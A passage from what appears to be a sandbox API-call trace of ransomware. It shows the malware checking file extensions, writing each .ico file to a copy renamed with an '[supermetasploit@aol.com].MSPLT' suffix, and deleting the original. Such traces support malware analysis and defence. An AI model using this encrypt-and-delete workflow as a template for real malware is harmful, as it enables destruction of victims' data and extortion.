(lpString1=".bz2", lpString2=".ico") returned -1 [0173.032] lstrlenW (lpString=".7z") returned 3 [0173.032] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0173.032] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0173.032] lstrlenW (lpString=".dbf") returned 4 [0173.032] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0173.032] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0173.032] lstrlenW (lpString=".1cd") returned 4 [0173.032] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0173.032] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0173.032] lstrlenW (lpString=".jpg") returned 4 [0173.032] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0173.032] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0173.032] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0173.032] lstrlenW (lpString=".doc") returned 4 [0173.032] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0173.032] lstrlenW (lpString=".docx") returned 5 [0173.032] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0173.033] lstrlenW (lpString=".pdf") returned 4 [0173.033] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0173.033] lstrlenW (lpString=".xls") returned 4 [0173.033] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0173.033] lstrlenW (lpString=".xlsx") returned 5 [0173.033] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0173.033] lstrlenW (lpString=".ppt") returned 4 [0173.033] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0173.033] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0173.033] lstrlenW (lpString=".zip") returned 4 [0173.033] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0173.033] lstrlenW (lpString=".rar") returned 4 [0173.033] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0173.033] lstrlenW (lpString=".bz2") returned 4 [0173.033] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0173.033] lstrlenW (lpString=".7z") returned 3 [0173.033] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0173.033] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0173.033] lstrlenW (lpString=".dbf") returned 4 [0173.033] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0173.033] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0173.033] lstrlenW (lpString=".1cd") returned 4 [0173.033] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0173.033] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0173.033] lstrlenW (lpString=".jpg") returned 4 [0173.033] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0173.033] lstrcmpiW (lpString1=".ico", lpString2=".MSPLT") returned -1 [0173.034] lstrlenW (lpString="Save.ico") returned 8 [0173.034] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0173.038] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=1150) returned 1 [0173.038] CloseHandle (hObject=0x30c) returned 1 [0173.039] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico")) returned 0x80 [0173.039] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.039] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0173.039] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.039] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.039] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0173.956] GetLastError () returned 0x0 [0173.956] ReadFile (in: hFile=0x30c, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x47e, lpOverlapped=0x0) returned 1 [0174.003] WriteFile (in: hFile=0x350, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0x480, lpOverlapped=0x0) returned 1 [0174.006] ReadFile (in: hFile=0x30c, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0174.006] WriteFile (in: hFile=0x350, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0xe4, lpOverlapped=0x0) returned 1 [0174.006] SetEndOfFile (hFile=0x350) returned 1 [0174.007] CloseHandle (hObject=0x350) returned 1 [0174.009] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.009] SetEndOfFile (hFile=0x30c) returned 1 [0174.010] CloseHandle (hObject=0x30c) returned 1 [0174.010] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0174.011] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico")) returned 1 [0174.011] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0174.011] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0174.011] lstrlenW (lpString=".doc") returned 4 [0174.011] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0174.012] lstrlenW (lpString=".docx") returned 5 [0174.012] lstrcmpiW (lpString1=".docx", lpString2="e.ico") returned -1 [0174.012] lstrlenW (lpString=".pdf") returned 4 [0174.012] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0174.012] lstrlenW (lpString=".xls") returned 4 [0174.012] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0174.012] lstrlenW (lpString=".xlsx") returned 5 [0174.012] lstrcmpiW (lpString1=".xlsx", lpString2="e.ico") returned -1 [0174.012] lstrlenW (lpString=".ppt") returned 4 [0174.012] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0174.012] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0174.012] lstrlenW (lpString=".zip") returned 4 [0174.012] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0174.012] lstrlenW (lpString=".rar") returned 4 [0174.012] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0174.012] lstrlenW (lpString=".bz2") returned 4 [0174.012] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0174.013] lstrlenW (lpString=".7z") returned 3 [0174.013] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0174.013] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0174.013] lstrlenW (lpString=".dbf") returned 4 [0174.013] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0174.013] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0174.013] lstrlenW (lpString=".1cd") returned 4 [0174.013] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0174.013] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0174.013] lstrlenW (lpString=".jpg") returned 4 [0174.013] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0174.013] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0174.013] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0174.013] lstrlenW (lpString=".doc") returned 4 [0174.013] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0174.013] lstrlenW (lpString=".docx") returned 5 [0174.013] lstrcmpiW (lpString1=".docx", lpString2="e.ico") returned -1 [0174.013] lstrlenW (lpString=".pdf") returned 4 [0174.013] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0174.013] lstrlenW (lpString=".xls") returned 4 [0174.013] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0174.013] lstrlenW (lpString=".xlsx") returned 5 [0174.013] lstrcmpiW (lpString1=".xlsx", lpString2="e.ico") returned -1 [0174.013] lstrlenW (lpString=".ppt") returned 4 [0174.013] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0174.013] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0174.013] lstrlenW (lpString=".zip") returned 4 [0174.013] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0174.014] lstrlenW (lpString=".rar") returned 4 [0174.014] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0174.014] lstrlenW (lpString=".bz2") returned 4 [0174.014] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0174.014] lstrlenW (lpString=".7z") returned 3 [0174.014] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0174.014] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0174.014] lstrlenW (lpString=".dbf") returned 4 [0174.014] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0174.014] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0174.014] lstrlenW (lpString=".1cd") returned 4 [0174.014] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0174.014] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 39 [0174.014] lstrlenW (lpString=".jpg") returned 4 [0174.014] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0174.014] lstrcmpiW (lpString1=".ico", lpString2=".MSPLT") returned -1 [0174.014] lstrlenW (lpString="stop.ico") returned 8 [0174.014] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0174.015] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=10134) returned 1 [0174.015] CloseHandle (hObject=0x30c) returned 1 [0174.015] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico")) returned 0x80 [0174.015] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.015] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0174.015] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.015] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.015] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0174.016] GetLastError () returned 0x0 [0174.016] ReadFile (in: hFile=0x30c, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x2796, lpOverlapped=0x0) returned 1 [0174.031] WriteFile (in: hFile=0x350, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0x27a0, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0x27a0, lpOverlapped=0x0) returned 1 [0174.033] ReadFile (in: hFile=0x30c, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0174.033] WriteFile (in: hFile=0x350, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0xe4, lpOverlapped=0x0) returned 1 [0174.033] SetEndOfFile (hFile=0x350) returned 1 [0174.033] CloseHandle (hObject=0x350) returned 1 [0174.034] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.035] SetEndOfFile (hFile=0x30c) returned 1 [0174.036] CloseHandle (hObject=0x30c) returned 1 [0174.036] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0174.036] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico")) returned 1 [0174.037] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0174.037] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0174.037] lstrlenW (lpString=".doc") returned 4 [0174.037] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0174.037] lstrlenW (lpString=".docx") returned 5 [0174.037] lstrcmpiW (lpString1=".docx", lpString2="p.ico") returned -1 [0174.037] lstrlenW (lpString=".pdf") returned 4 [0174.037] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0174.037] lstrlenW (lpString=".xls") returned 4 [0174.037] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0174.037] lstrlenW (lpString=".xlsx") returned 5 [0174.037] lstrcmpiW (lpString1=".xlsx", lpString2="p.ico") returned -1 [0174.037] lstrlenW (lpString=".ppt") returned 4 [0174.037] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0174.037] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0174.037] lstrlenW (lpString=".zip") returned 4 [0174.037] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0174.037] lstrlenW (lpString=".rar") returned 4 [0174.037] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0174.037] lstrlenW (lpString=".bz2") returned 4 [0174.037] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0174.037] lstrlenW (lpString=".7z") returned 3 [0174.037] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0174.037] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0174.037] lstrlenW (lpString=".dbf") returned 4 [0174.037] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0174.038] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0174.038] lstrlenW (lpString=".1cd") returned 4 [0174.038] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0174.038] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0174.038] lstrlenW (lpString=".jpg") returned 4 [0174.038] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0174.038] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0174.038] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0174.038] lstrlenW (lpString=".doc") returned 4 [0174.038] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0174.038] lstrlenW (lpString=".docx") returned 5 [0174.038] lstrcmpiW (lpString1=".docx", lpString2="p.ico") returned -1 [0174.038] lstrlenW (lpString=".pdf") returned 4 [0174.038] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0174.038] lstrlenW (lpString=".xls") returned 4 [0174.038] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0174.038] lstrlenW (lpString=".xlsx") returned 5 [0174.038] lstrcmpiW (lpString1=".xlsx", lpString2="p.ico") returned -1 [0174.038] lstrlenW (lpString=".ppt") returned 4 [0174.038] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0174.038] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0174.038] lstrlenW (lpString=".zip") returned 4 [0174.038] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0174.038] lstrlenW (lpString=".rar") returned 4 [0174.038] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0174.038] lstrlenW (lpString=".bz2") returned 4 [0174.039] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0174.039] lstrlenW (lpString=".7z") returned 3 [0174.039] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0174.039] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0174.039] lstrlenW (lpString=".dbf") returned 4 [0174.039] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0174.039] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0174.039] lstrlenW (lpString=".1cd") returned 4 [0174.039] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0174.039] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0174.039] lstrlenW (lpString=".jpg") returned 4 [0174.039] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0174.039] lstrcmpiW (lpString1=".ico", lpString2=".MSPLT") returned -1 [0174.039] lstrlenW (lpString="SysReqMet.ico") returned 13 [0174.039] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0174.040] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=1150) returned 1 [0174.040] CloseHandle (hObject=0x30c) returned 1 [0174.040] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico")) returned 0x80 [0174.040] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.040] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0174.040] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.040] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.040] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0174.041] GetLastError () returned 0x0 [0174.041] ReadFile (in: hFile=0x30c, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x47e, lpOverlapped=0x0) returned 1 [0174.436] WriteFile (in: hFile=0x350, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0x480, lpOverlapped=0x0) returned 1 [0174.437] ReadFile (in: hFile=0x30c, lpBuffer=0x3a3c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0174.500] WriteFile (in: hFile=0x350, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fc94*=0xee, lpOverlapped=0x0) returned 1 [0174.500] SetEndOfFile (hFile=0x350) returned 1 [0174.500] CloseHandle (hObject=0x350) returned 1 [0174.501] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.501] SetEndOfFile (hFile=0x30c) returned 1 [0174.502] CloseHandle (hObject=0x30c) returned 1 [0174.502] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0174.503] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico")) returned 1 [0174.503] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0174.503] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0174.503] lstrlenW (lpString=".doc") returned 4 [0174.503] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0174.503] lstrlenW (lpString=".docx") returned 5 [0174.503] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0174.503] lstrlenW (lpString=".pdf") returned 4 [0174.503] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0174.503] lstrlenW (lpString=".xls") returned 4 [0174.503] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0174.503] lstrlenW (lpString=".xlsx") returned 5 [0174.504] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0174.504] lstrlenW (lpString=".ppt") returned 4 [0174.504] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0174.504] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0174.505] lstrlenW (lpString=".zip") returned 4 [0174.505] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0174.522] lstrlenW (lpString=".rar") returned 4 [0174.522] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0174.522] lstrlenW (lpString=".bz2") returned 4 [0174.522] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0174.522] lstrlenW (lpString=".7z") returned 3 [0174.522] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0174.522] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0174.522] lstrlenW (lpString=".dbf") returned 4 [0174.522] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0174.522] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0174.522] lstrlenW (lpString=".1cd") returned 4 [0174.522] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0174.522] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0174.522] lstrlenW (lpString=".jpg") returned 4 [0174.522] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0174.522] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0174.523] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0174.523] lstrlenW (lpString=".doc") returned 4 [0174.523] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0174.523] lstrlenW (lpString=".docx") returned 5 [0174.523] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0174.523] lstrlenW (lpString=".pdf") returned 4 [0174.523] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0174.523] lstrlenW (lpString=".xls") returned 4 [0174.523] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0174.523] lstrlenW (lpString=".xlsx") returned 5 [0174.523] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0174.523] lstrlenW (lpString=".ppt") returned 4 [0174.523] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0174.523] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0174.523] lstrlenW (lpString=".zip") returned 4 [0174.523] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0174.523] lstrlenW (lpString=".rar") returned 4 [0174.523] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0174.523] lstrlenW (lpString=".bz2") returned 4 [0174.523] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0174.523] lstrlenW (lpString=".7z") returned 3 [0174.523] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0174.523] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0174.523] lstrlenW (lpString=".dbf") returned 4 [0174.523] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0174.523] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0174.523] lstrlenW (lpString=".1cd") returned 4 [0174.523] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0174.524] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 44 [0174.524] lstrlenW 